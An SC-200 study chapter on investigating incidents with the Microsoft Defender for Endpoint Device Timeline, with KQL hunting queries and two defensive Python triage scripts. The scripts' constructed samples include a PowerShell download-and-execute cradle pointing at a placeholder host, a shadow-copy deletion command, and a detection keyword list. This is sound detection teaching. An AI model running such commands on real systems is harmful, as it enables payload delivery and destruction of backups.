This chapter covers Device Timeline Analysis in Microsoft Defender for Endpoint (MDE), a critical skill for the SC-200 exam. Device Timeline allows security analysts to investigate historical events on a device, reconstructing the sequence of actions that led to an incident. Device investigation questions, covering timeline usage, event types, and the link to Advanced Hunting, make up a meaningful share of the exam. Mastering this topic is essential for passing the SC-200 and for real-world threat hunting and incident response.
Think of the Device Timeline in Microsoft Defender for Endpoint (MDE) as the black box flight recorder on an aircraft. Just as a flight recorder continuously captures every sensor reading, pilot input, and system event during a flight, the Device Timeline records process creations, file modifications, network connections, registry changes, scheduled task events, and other sensor telemetry on an onboarded device (Windows, and with fewer event types, macOS and Linux). When an incident occurs, such as a security breach, the timeline allows investigators to replay the sequence of events leading up to and following the compromise. Each event carries a sub-second timestamp and a link to the parent (initiating) process, just as a flight recorder links each action to the pilot or system component. The timeline is not a live stream but a historical view of one device; the same telemetry can be queried across devices with Advanced Hunting in the Microsoft Defender portal. Analysts can filter by event type, user, process, or file hash to reconstruct an attacker's kill chain. Without this timeline, investigating an incident would be like trying to determine the cause of a plane crash without the flight recorder: guesswork and incomplete data.
What is the Device Timeline?
The Device Timeline is a feature in Microsoft Defender for Endpoint that provides a chronological view of events that have occurred on a specific device. It is accessible from the Microsoft Defender portal (security.microsoft.com, formerly the Microsoft 365 Defender portal) by navigating to Assets > Devices, selecting a device, and then clicking the 'Timeline' tab. The timeline displays events such as process creations, file modifications, network connections, registry changes, scheduled task creations, and alert triggers. Each event includes a timestamp, the action taken, the file or process involved, and the parent process that initiated it. This allows analysts to trace the origin of malicious activity and understand the full scope of an attack.
How the Timeline Is Populated
The timeline is built from telemetry collected by the Microsoft Defender for Endpoint sensor on each onboarded device. On Windows the sensor draws on Event Tracing for Windows (ETW) and kernel-mode components; the macOS and Linux sensors use their platforms' equivalents and report fewer event types. Events are normalized and sent to the cloud, where they are stored in the Defender XDR backend. How long they are kept is a tenant-level choice made at onboarding and adjustable later under Settings > Endpoints > Data retention, anywhere from 30 to 180 days; it is a portal setting, not a separate licence tier. Advanced Hunting keeps 30 days of raw event data regardless of that setting. The timeline is updated in near real-time, usually within minutes of an event occurring on the device.
Key Components of the Timeline
Timestamp: The exact date and time (UTC) when the event occurred, down to milliseconds.
Action: The type of event, such as 'Process created', 'File modified', 'Network connection', 'Registry value set', 'Scheduled task created', etc.
File/Process: The name and full path of the file or process involved. For processes, the command line is also shown.
Parent process: The process that initiated the event, with its PID and command line. This is crucial for understanding process ancestry.
User: The account under which the event ran (e.g., DOMAIN\user).
Device: The device name and ID.
SHA256 hash: The cryptographic hash of the file, useful for threat intelligence lookups.
Alert ID: If the event triggered an alert, the corresponding alert ID is linked.
How to Use the Timeline for Investigation
To investigate an incident, analysts typically start from an alert. Clicking the alert opens the incident page, which lists affected devices. From a device page, the timeline can be filtered by time range, event type, user, process, file hash, or specific keywords. For example, to find all PowerShell executions, filter Action: 'Process created' and File name: 'powershell.exe'. The timeline can be exported to CSV for offline analysis.
Advanced Hunting and the Timeline
The same sensor telemetry that populates the timeline is queryable in Advanced Hunting (Hunting > Advanced hunting in the portal), which keeps 30 days of raw event data. The relevant tables are:
DeviceProcessEvents: Process creation events (FileName, ProcessCommandLine, and the InitiatingProcess* columns that describe the parent).
DeviceFileEvents: File creation, modification, deletion, and rename events.
DeviceNetworkEvents: Network connections (RemoteIP, RemotePort, RemoteUrl).
DeviceRegistryEvents: Registry modifications.
DeviceEvents: Miscellaneous events (e.g., scheduled task creation, WMI activity, logged PowerShell commands).
DeviceLogonEvents and DeviceImageLoadEvents: Logons and DLL loads, which the timeline also surfaces.
These tables expose the same underlying data as the timeline with a documented column schema, and are queried in Kusto Query Language (KQL). One naming convention matters for ancestry: the event's own process is described by FileName, ProcessId and ProcessCommandLine, and its parent by the InitiatingProcess* columns. For example, to find all processes spawned by a suspicious parent:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "malware.exe"
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine,
          InitiatingProcessId, InitiatingProcessCommandLine

Interacting with Related Technologies
Microsoft 365 Defender: The timeline is part of the unified security platform. Alerts from Microsoft Defender for Office 365, Defender for Cloud Apps, and Defender for Identity can link to device timelines.
Microsoft Sentinel: Timeline data can be streamed to Sentinel for long-term retention and correlation with other data sources.
Threat Intelligence: File hashes from the timeline can be used to query threat intelligence feeds for known malware.
Defaults and Limits
Retention: a tenant setting between 30 and 180 days (Settings > Endpoints > Data retention); Advanced Hunting queries the last 30 days of raw events.
Event volume: the sensor does not report every event on a busy device; high-volume event types can be throttled, so absence of an event in the timeline is never proof that it did not happen.
Time zone: all timestamps are stored in UTC; the portal can display them in your local time zone.
Data types: events come from the MDE sensor on supported platforms (Windows 10/11 and supported Windows Server releases, macOS, Linux); coverage is richest on Windows.
Step-by-Step Investigation Workflow
Identify the incident: Start from an alert or a suspicious device in the queue.
Narrow the time range: Set the timeline filter to the time of the alert ± 1 hour.
Filter by event type: Look for process creation, file writes, and network connections.
Examine process tree: Click on a process to see its parent and children.
Check file hashes: Open the file page for a suspicious SHA256 (search the portal by hash) to see its prevalence in the organization, the VirusTotal and Microsoft threat intelligence verdicts, and related alerts.
Correlate with alerts: Note any alerts that appear in the timeline.
Export evidence: Export relevant events to CSV for reporting.
Common Pitfalls
Overlooking parent processes: Always check the parent process; many attacks use LOLBins (e.g., wscript.exe spawning cmd.exe).
Ignoring timestamps: Events may occur milliseconds apart; order matters.
Assuming all events are captured: Some events like kernel-mode rootkits may bypass the sensor.
Exam Relevance
The SC-200 exam expects candidates to know:
How to access the timeline from the device page.
The types of events available (process, file, network, registry, etc.).
How to filter and export timeline data.
The relationship between timeline and Advanced Hunting tables.
Where retention is configured (Settings > Endpoints > Data retention, 30 to 180 days), that Advanced Hunting keeps 30 days of raw data, and how to retain data longer by streaming it out.
How to use the timeline to identify process ancestry.
Sample KQL Query for Timeline Analysis
To find suspicious PowerShell execution with encoded commands (the switch can be abbreviated, so match -enc, -ec and -e as well as the full name):
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine matches regex @"(?i)\s-e(c|nc|ncodedcommand)?\s"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine

Access the Device Timeline
Log in to the Microsoft Defender portal (security.microsoft.com) with a role that grants device investigation rights (Security Reader or Security Administrator, or a custom MDE role). Navigate to Assets > Devices. Search for the device by name or IP address. Click on the device name to open its details page. Select the 'Timeline' tab. The timeline opens on a recent window; adjust the time range with the date picker, bearing in mind that events older than the tenant's data retention setting are gone. The timeline is paginated; use the 'Load more' button to fetch additional events.
Filter Events by Type
Use the filter bar to narrow down events. Click 'Add filter' and select an event type such as 'Process created', 'File modified', 'Network connection', 'Registry value set', or 'Scheduled task created'. You can also filter by user (e.g., 'NT AUTHORITY\SYSTEM'), process name (e.g., 'cmd.exe'), or file hash (SHA256). Multiple filters combine with AND logic and apply immediately. For example, to see only PowerShell executions, set Action: 'Process created' and File name: 'powershell.exe'.
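Filtering for powershell.exe puts the process command line in front of you, and when it carries -EncodedCommand (the pattern the sample KQL query earlier in this page hunts for) the argument is base64 of UTF-16LE text. Decoding it offline, with the short forms -enc, -ec and -e handled, is a safer triage step than pasting it into a shell. The following Python is an added example written for this page, not code from Microsoft or the Defender portal; the command lines and the indicator watch list are constructed, and the regex assumes the base64 argument directly follows the switch.

```python
import base64
import re
from typing import Optional

# -EncodedCommand may be abbreviated to any unique prefix; -enc, -ec and -e are
# the forms seen most often. The argument is base64 of UTF-16LE text.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[\"']?([A-Za-z0-9+/=]+)")

# Substrings that, in a decoded script, usually mean download-and-execute or a
# second layer of obfuscation. Constructed watch list for this example.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "invoke-webrequest", "bypass")


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (or -enc/-ec/-e), or None."""
    m = _ENC_RE.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode the payload as PowerShell does (UTF-16LE). Tolerates stripped
    padding; returns None for anything that is not valid base64 or UTF-16LE."""
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(command_line: str) -> dict:
    """One timeline command line in, a triage record out."""
    b64 = extract_encoded_command(command_line)
    decoded = decode_encoded_command(b64) if b64 else None
    hits = [i for i in INDICATORS if decoded and i in decoded.lower()]
    return {"encoded": b64 is not None, "decoded": decoded, "indicators": hits}


def encode_for_powershell(script: str) -> str:
    """Used only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines: two encoded forms, one benign, one that
# looks like base64 but is not UTF-16LE text.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_B64 = encode_for_powershell(SAMPLE_SCRIPT)
SAMPLE_LINES = [
    "powershell.exe -NoP -W Hidden -EncodedCommand " + SAMPLE_B64,
    'powershell.exe -nop -w hidden -enc "' + SAMPLE_B64 + '"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -enc QUJD",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage(line))
```

The indicator check runs on the decoded text only; "Bypass" in the raw command line of the third sample is an execution-policy switch, not evidence on its own, which is why it is not flagged.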
Examine Process Tree
Click on any event row to expand it. The expanded view shows the parent process and any child processes. For process creation events, the command line of the process and parent process is displayed. Use this to understand the process ancestry. For example, a suspicious process like 'malware.exe' spawned by 'winword.exe' strongly suggests a macro or document exploit, because Word has no legitimate reason to launch an unknown executable. You can click on the parent process name to navigate to its event in the timeline, effectively tracing the attack chain backwards.
Correlate with Alerts
Events that triggered an alert have an 'Alert ID' field. Clicking the alert ID opens the alert details page. This allows you to see the full context of why the alert was generated. You can also see if multiple events are associated with the same alert. This helps in understanding the severity and scope of the incident. For example, a file creation event followed by a network connection might be part of a C2 communication.
Export Timeline Data
To export the timeline, click the 'Export' button at the top of the timeline and choose CSV format. The export contains the currently displayed (filtered) events, subject to the portal's row cap, so narrow the time range and filters first rather than exporting a busy device's whole history. Columns include the timestamp, device name, action, file name and folder path, SHA256, the process and parent process names and IDs, the user, remote IP and port for network events, and the alert ID where one applies; check the header row of an actual export rather than assuming a fixed layout. This data can be used for offline analysis, reporting, or integration with SIEM systems like Microsoft Sentinel.
Enterprise Scenario 1: Ransomware Investigation
A large enterprise detects a ransomware alert on a finance department workstation. The SOC analyst opens the device timeline and filters for the time range of the alert. They see a process creation event: a malicious executable dropped by a macro-enabled email attachment. The timeline shows the executable modifying hundreds of files (file modification events) and then deleting shadow copies (process creation: vssadmin.exe with 'delete shadows'). The analyst traces back to the parent process: the macro launched from Microsoft Word (winword.exe). They also see a network connection to an external IP shortly before the encryption begins, likely command and control. The timeline helps them understand the kill chain on this host: initial access via phishing, a registry Run key and a scheduled task for persistence, a C2 check-in, and finally ransomware execution. The analyst takes the SHA256 hash from the timeline and adds it as a custom indicator (Settings > Endpoints > Indicators) to block the file across all endpoints.
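The scenario above, together with the export and process-tree steps and the Step-by-Step Investigation Workflow earlier on this page, comes down to one mechanical task an analyst repeats: rebuild process ancestry from exported rows and flag the links that matter. The following Python is an added example, not code from this page or from Microsoft. It parses a constructed timeline CSV whose columns follow the layout described in the export section (ProcessCommandLine is an assumed extra column), walks ParentProcessId links to produce a chain such as vssadmin.exe <- invoice.exe <- powershell.exe <- winword.exe, and flags Office-spawned interpreters, shadow-copy deletion, and mass file modification.

```python
import csv
import io
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample export. Column names follow the CSV layout described on
# this page; ProcessCommandLine is an assumed extra column. Hashes, alert IDs,
# PIDs and the device name are dummies.
SAMPLE_CSV = r"""Timestamp,DeviceName,Action,FileName,FolderPath,SHA256,ProcessName,ProcessId,ParentProcessName,ParentProcessId,UserName,RemoteIP,RemotePort,AlertId,ProcessCommandLine
2024-05-01T09:00:00.000Z,FIN-WS-07,Process created,winword.exe,C:\Program Files\Microsoft Office\root\Office16,sha-w,winword.exe,4100,explorer.exe,1200,CORP\jdoe,,,,WINWORD.EXE /n invoice.docm
2024-05-01T09:00:12.410Z,FIN-WS-07,Process created,powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0,sha-p,powershell.exe,4312,winword.exe,4100,CORP\jdoe,,,,powershell.exe -w hidden -enc SQBFAFgA
2024-05-01T09:00:15.002Z,FIN-WS-07,Network connection,powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0,sha-p,powershell.exe,4312,winword.exe,4100,CORP\jdoe,203.0.113.5,443,,
2024-05-01T09:00:20.118Z,FIN-WS-07,File created,invoice.exe,C:\Users\jdoe\AppData\Local\Temp,sha-i,powershell.exe,4312,winword.exe,4100,CORP\jdoe,,,,
2024-05-01T09:00:25.300Z,FIN-WS-07,Process created,invoice.exe,C:\Users\jdoe\AppData\Local\Temp,sha-i,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,,invoice.exe
2024-05-01T09:00:30.007Z,FIN-WS-07,Process created,vssadmin.exe,C:\Windows\System32,sha-v,vssadmin.exe,4620,invoice.exe,4500,CORP\jdoe,,,,vssadmin.exe delete shadows /all /quiet
2024-05-01T09:00:31.000Z,FIN-WS-07,File modified,Q1-budget.xlsx,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
2024-05-01T09:00:31.020Z,FIN-WS-07,File modified,payroll-2024.xlsx,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
2024-05-01T09:00:31.041Z,FIN-WS-07,File modified,vendors.docx,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
2024-05-01T09:00:31.063Z,FIN-WS-07,File modified,forecast.pptx,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
2024-05-01T09:00:31.084Z,FIN-WS-07,File modified,ledger.csv,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
2024-05-01T09:00:31.105Z,FIN-WS-07,File modified,contracts.pdf,C:\Users\jdoe\Documents,,invoice.exe,4500,powershell.exe,4312,CORP\jdoe,,,alert-0001,
"""


@dataclass
class Proc:
    pid: int
    name: str
    parent_pid: Optional[int]
    parent_name: str
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
MASS_WRITE_THRESHOLD = 5  # files touched by one process before it is called out


def load_events(csv_text: str) -> list:
    return list(csv.DictReader(io.StringIO(csv_text)))


def build_process_map(events) -> dict:
    """Index 'Process created' rows by PID. First creation wins; real exports
    spanning days can reuse PIDs, so a production version keys on time too."""
    pmap = {}
    for ev in events:
        if ev["Action"] != "Process created" or not ev["ProcessId"]:
            continue
        pid = int(ev["ProcessId"])
        if pid not in pmap:
            parent = ev.get("ParentProcessId") or ""
            pmap[pid] = Proc(pid, ev["FileName"].lower(),
                             int(parent) if parent else None,
                             (ev.get("ParentProcessName") or "").lower(),
                             ev.get("ProcessCommandLine") or "")
    return pmap


def ancestry(pmap: dict, pid: int) -> list:
    """Child-to-root chain of process names. Stops at a parent with no creation
    row in the export (its name is still known from the child) or on a PID loop."""
    chain, seen = [], set()
    node = pmap.get(pid)
    while node is not None and node.pid not in seen:
        seen.add(node.pid)
        chain.append(node.name)
        if node.parent_pid not in pmap:
            if node.parent_name:
                chain.append(node.parent_name)
            break
        node = pmap[node.parent_pid]
    return chain


def findings(events, pmap: dict) -> list:
    out = []
    for pid, proc in pmap.items():
        chain = ancestry(pmap, pid)
        pretty = " <- ".join(chain)
        # An Office app anywhere above a script host is the macro pattern.
        if proc.name in INTERPRETERS and any(a in OFFICE_APPS for a in chain[1:]):
            out.append(f"office-spawned interpreter: {pretty}")
        cl = proc.command_line.lower()
        if proc.name == "vssadmin.exe" and "delete" in cl and "shadows" in cl:
            out.append(f"shadow copy deletion: {pretty}")
    # Ransomware shows up as one process touching many files in a short window.
    writes = Counter(int(ev["ProcessId"]) for ev in events
                     if ev["Action"] == "File modified" and ev["ProcessId"])
    for pid, n in writes.items():
        if n >= MASS_WRITE_THRESHOLD:
            who = pmap[pid].name if pid in pmap else f"pid {pid}"
            out.append(f"mass file modification: {who} touched {n} files")
    return out


if __name__ == "__main__":
    evs = load_events(SAMPLE_CSV)
    procs = build_process_map(evs)
    print(" <- ".join(ancestry(procs, 4620)))
    for line in findings(evs, procs):
        print(line)
```

The chain stops at explorer.exe because its own creation row is outside the exported window; that is the normal shape of a filtered export, and the parent name carried on the child's row is what lets the walk end with a name rather than a bare PID.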
Enterprise Scenario 2: Insider Threat Detection
A healthcare organization suspects an employee of exfiltrating patient data. The security team accesses the timeline for the employee's device. They filter by 'Network connection' events and see repeated connections to a cloud storage service (e.g., Dropbox) during off-hours. The timeline also shows 'File modified' events for sensitive database files just before the connections. The parent process is a custom script (launched from cmd.exe). The timeline reveals the script was created using Notepad (file creation event) by the same user. The team uses the timeline to establish a pattern of behavior and gather evidence for HR action.
Performance and Scale Considerations
In large organizations with thousands of devices, the timeline can generate significant telemetry. The sensor already limits what it reports (high-volume event types can be throttled on busy devices), so absence of an event in the timeline is not proof it never happened. The tenant data retention setting (Settings > Endpoints > Data retention, 30 to 180 days) is usually sufficient for investigations, but compliance requirements may call for longer retention: stream the raw events with the Defender for Endpoint Streaming API to Azure Event Hubs or a Log Analytics workspace, or connect the data to Microsoft Sentinel. When investigating, avoid loading the entire timeline for a device with high event volume; always use filters to limit the data. The portal may time out if querying a very large dataset; consider using Advanced Hunting with KQL for complex queries.
What SC-200 Tests on Device Timeline
The SC-200 objectives on investigating and responding to threats in Microsoft Defender XDR include using the device timeline to investigate incidents. Specifically, you must know:
How to access the timeline from the device page.
The types of events captured (process, file, network, registry, scheduled tasks).
How to filter by event type, time range, user, process, and file hash.
How to interpret process ancestry (parent-child relationships).
Where retention is configured (Settings > Endpoints > Data retention, 30 to 180 days), that Advanced Hunting keeps 30 days of raw data, and that longer retention means streaming the data out (Sentinel, Log Analytics, Event Hubs).
How to export timeline data to CSV.
The relationship between timeline events and Advanced Hunting tables (DeviceProcessEvents, DeviceFileEvents, etc.).
Common Wrong Answers and Why
'The timeline shows real-time events.' – Incorrect. Events appear minutes after they happen, after upload and processing; the timeline is historical, not live.
'Timeline events are stored for 90 days by default.' – Incorrect. Retention is a tenant setting between 30 and 180 days, and Advanced Hunting keeps 30 days of raw data; a fixed 90 days is a common distractor.
'You can modify timeline events.' – Incorrect. The timeline is read-only; you cannot edit or delete events.
'The timeline includes events from all Microsoft 365 workloads.' – Incorrect. It is built from the MDE sensor on that specific device (plus the alerts raised on it); mailbox, SaaS and identity activity live in their own products' views.
Specific Numbers and Terms
Retention: tenant setting of 30 to 180 days (Settings > Endpoints > Data retention); Advanced Hunting queries 30 days of raw data.
Delay: minutes, not seconds (near real-time, not live).
Export: CSV of the currently displayed events, subject to the portal's row cap.
Event types: Process created, File modified, Network connection, Registry value set, Scheduled task created.
Parent process field is critical for tracing attack chains.
Edge Cases
Throttled telemetry: On very noisy devices the sensor can throttle high-volume event types, so not every event is guaranteed to appear. The exam may test that you understand the timeline is not an exhaustive record.
Offline devices: If a device is offline, events are buffered locally and uploaded when the device reconnects. The timeline may show a gap until that upload completes.
Non-Windows devices: macOS and Linux devices onboarded to MDE also have a timeline, with fewer event types than Windows; mobile devices are limited to what the MDE mobile app reports.
How to Eliminate Wrong Answers
If an answer says 'real-time', eliminate it.
If an answer mentions editing events, eliminate it.
If an answer says 'every event on the device is stored', eliminate it; telemetry is throttled and retention is finite.
Look for answers that describe retention as a tenant setting (30 to 180 days), with Advanced Hunting keeping 30 days of raw data.
The device timeline is a per-device historical view of events reported by the MDE sensor, bounded by the tenant's data retention setting (30 to 180 days).
Event types include process creation, file modification, network connection, registry change, and scheduled task creation.
Timeline events appear minutes after they happen; the view is near real-time, not live.
Filter by time range, event type, user, process, file hash, or alert ID.
Process ancestry (parent-child) is critical for tracing attack chains.
Export timeline data to CSV for offline analysis (the currently displayed events, subject to the portal's row cap).
Timeline data is also available via Advanced Hunting tables like DeviceProcessEvents.
High-volume event types may be throttled on busy devices, so the timeline is not an exhaustive record.
The timeline and Advanced Hunting come up on the exam all the time. Here's how to tell them apart.
Device Timeline
Accessed from device page in M365 Defender portal.
Shows events for a single device only.
Limited to what the portal can render and export for one device.
Filtering is done via dropdowns and text inputs.
Suitable for quick, device-centric investigations.
Advanced Hunting
Accessed via Hunting > Advanced Hunting in portal.
Can query across all devices and other data sources.
Result sets are also capped (the portal truncates large results), but one query can span many devices and tables at once.
Queries are written in Kusto Query Language (KQL).
Suitable for complex cross-device threat hunting and correlation.
Mistake
The device timeline shows events in real time.
Correct
Events appear in the timeline minutes after they happen, once telemetry has been uploaded and processed. It is near real-time, not a live stream.
Mistake
All events on a device are captured in the timeline.
Correct
The sensor throttles high-volume event types on busy devices and retention is finite, so not every event is guaranteed to appear.
Mistake
The timeline can be used to modify or delete events.
Correct
The timeline is read-only. You cannot edit or delete events. It is for investigation only.
Mistake
The timeline includes events from all Microsoft 365 services.
Correct
The timeline only includes events from the Microsoft Defender for Endpoint sensor on that specific device. Events from Office 365, Cloud Apps, etc., are not included.
Mistake
The default retention period for timeline events is 90 days.
Correct
Retention is not a fixed 90 days. It is a tenant setting between 30 and 180 days (Settings > Endpoints > Data retention), and Advanced Hunting keeps 30 days of raw events. Longer retention requires streaming the data out to Sentinel, a Log Analytics workspace, or Event Hubs.
Self-Check Questions
Question: How do you open the device timeline?
Answer: Go to security.microsoft.com, navigate to Assets > Devices, click on a device name, then select the 'Timeline' tab. You must have appropriate permissions (Security Reader or above).
Question: How long are timeline events retained, and how do you keep them longer?
Answer: Retention is a tenant setting (30 to 180 days, Settings > Endpoints > Data retention); Advanced Hunting keeps 30 days of raw event data. For longer retention, stream the events to Microsoft Sentinel, a Log Analytics workspace, or Event Hubs. The exam often tests that retention is finite and where it is configured.
Question: Can you modify or delete timeline events?
Answer: No, the timeline is read-only. You cannot modify or delete events. It is designed for investigation and evidence collection only.
Question: Which event types does the timeline capture?
Answer: The timeline captures process creation, file modifications (create, modify, delete, rename), network connections, registry changes, and scheduled task creations. Other events like WMI activity may also appear under 'Miscellaneous'.
Question: How do you filter the timeline to PowerShell executions?
Answer: Click 'Add filter', set Action to 'Process created', and File name to 'powershell.exe'. You can also filter by command line using the 'Process command line' field if available.
Question: When do you use the timeline rather than Advanced Hunting?
Answer: The timeline is device-specific and provides a quick graphical view. Advanced Hunting allows KQL queries across all devices and data sources, offering more flexibility for complex investigations.
Question: How do you export timeline data?
Answer: Click the 'Export' button at the top of the timeline and choose CSV format. The export contains the currently displayed (filtered) events, up to the portal's row cap.